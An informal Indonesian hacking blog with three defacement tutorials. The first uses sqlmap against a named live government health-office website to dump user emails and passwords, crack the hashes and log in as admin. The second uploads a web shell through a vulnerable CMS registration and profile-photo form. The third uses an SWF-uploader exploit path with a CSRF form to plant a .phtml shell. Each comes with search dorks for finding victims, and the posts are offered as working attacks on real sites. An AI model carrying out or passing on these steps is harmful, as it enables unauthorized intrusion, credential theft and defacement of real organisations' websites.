Kamis, 11 April 2019

Deface SQL Via Termux + Live Target

Cara Deface Sqlmap Via
Termux 


Assalamualaikum.. Kali ini kita akan belajar deface website sqlmap via termux:V".. pasti kalian semua tau apa yg namanya termux.. kalaw kalian belom tau google dulu sana anjg.. manja:V".. aowkowkwoaowko gk ush bnyk cocot.. lngsng gass aja..

- Termux ( download diplaystore )
- Dork ( Cari digoogle )
- Pasang Tool Sqlmapnya dulu 
$ apt update 
$ apt install python
$ apt install python2
$ apt install git 
$ git clone https://github.com/sqlmapproject/sqlmap 
- Internet + Ketamvanan
Langkah pertama install dulu toolsna.. kalaw sudah tinggal jalanin caranya 
$cd sqlmap

Kemudian baru kita inject":V".. pertama" kita perintahkan
$ python2 sqlmap.py -u (target) --dbs
Contoh : 
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 --dbs


Kalaw sudah pasti akan muncul data basenya.. trs kita masukan perintah kedua 
$ python2 sqlmap.py -u (target) -D (database) --tables
Contoh :
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 --tables


Disitu kita nemuin user, tinggal kita cari tau data dari user tersebut
Dri column..
$ python2 sqlmap.py -u (target) -D (database) -T (NamaTable) --columns
Contoh :
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 -T users --columns


klo sudah akan muncul data colum user tersebut, tinggal kita pilih email dan password atau username dan password yg akan kita cari.. kalaw gw mending satu-satu biar gk ribet.. 
$ python2 sqlmap.py -u (target) -D (database) -T (NamaTable) -C (namadatacolumn) --dump
Contoh :
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 -T users -C email --dump


Kalaw password nya tinggal ubah aja tulisan emailnya..
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 -T users -C password --dump


Terakhir maka akan muncul data email dan pass yg tadi kita dump
Tinggal kalian hash aja passwordnya di hashkiller.. lalu kalian cari admin loginnya.. trs kalian login dah.. kalaw mau nebas index jangan lupa backup dulu kasian adminnya:V".. okok sekian dari gw
#Thanks For Reading
Share:

Senin, 08 April 2019

Deface Bug Register & Upload CMS Swarakalibata

Cara Deface Register & Upload Shell CMS Swarakalibata


Langsung post lagi ea gw:V".. skrng gw mau kasih tutorial bug cms swaralikabata.. nih metode udh lama tpi lumayan masih banyak web indo yg rentan atau vuln terhadap metode ini.. gw sendiri juga baru bisa nih metode.. dikasih tutorial Ama sensei gw akbar dravinky.. ydh gk ush bacot lama" gas aja..

Dork :
- intext:"PENDAFTARAN UNTUK KONTRIBUTOR ARTIKEL"
- inurl:/register.html 
- intext:"pendaftaran artikel" (kembangin lagi)

Shell Backdoor
Script Deface

Pertama kita dork dulu dibrowser


Pilih satu ntar pasti disuruh ngisi formulir.. isi aja sembarang.. foto kita isi dengan foto biasa dulu jangan shell


Kalau nih web vuln setelah sudah register kita pasti langsung keredirect ke halaman dashboard admin.. klaw gk keredirect berarti gk vuln.. kemudian kita cari edit profile


Kemudian update/ubah foto profile kita dengan shell kita.. 




Ea terakhir kita akses shell kita trs terserah lah mau diapain .. kalaw mau ngindex usahakan backup dulu.. kasian adminnya



Kalaw gw sih lebih suka nitip file:V"...  Kelar dah..
Jangan lupa share & coment gan;V.. 
Share:

Deface Poc Shokwave

Cara Deface Menggunakan
Metode Shokwave


Sorry lama gk post .. skrng gw mau kasih tutorial deface website dengan metode Shokwave.. metode ini jarang diketahui oleh orang bisa dibilang metode ini baru sih kalaw menurut gw.. ok langsung aja biar gk kemaleman:V".. bahan bahan :

- Dork : inurl:/ajax_general/ ext:php (kembangin)
- Exploit : http:/target.coli/path/path/swf-uploader/upload-maps-file.php
- Shell (ext: phtml)
- SC deface
- Csrf gk punya? Klik sini

Mula mula kita dork digoogle kek biasana


Cari dan pilih salah satu target .. kemudian masukan exploitnya.. kalaw vuln cirinya kek gambar dibawah 


Kemudian kita pergi ke csrfnya.. isikan dengan target kita lalu post file isi dengan "Filedata".. terus submit


Setelah submit kemudian kita upload shell kita ingat extnya .phml


Kalaw sukses terupload cirinya kek gambar dibawah.. terus cara aksesnya http://target.coli/file/nomer/shell.phml




Lah kalaw sudah terupload shellnya tinggal tebas dah:V"..


Aokwowkmwokwowkok udh kelar gan.. Jangan lupa share gan.. smkin bnyk yg view smkin gw rajin update tutorial:V"..
#Thank You.. see you in next post
Share: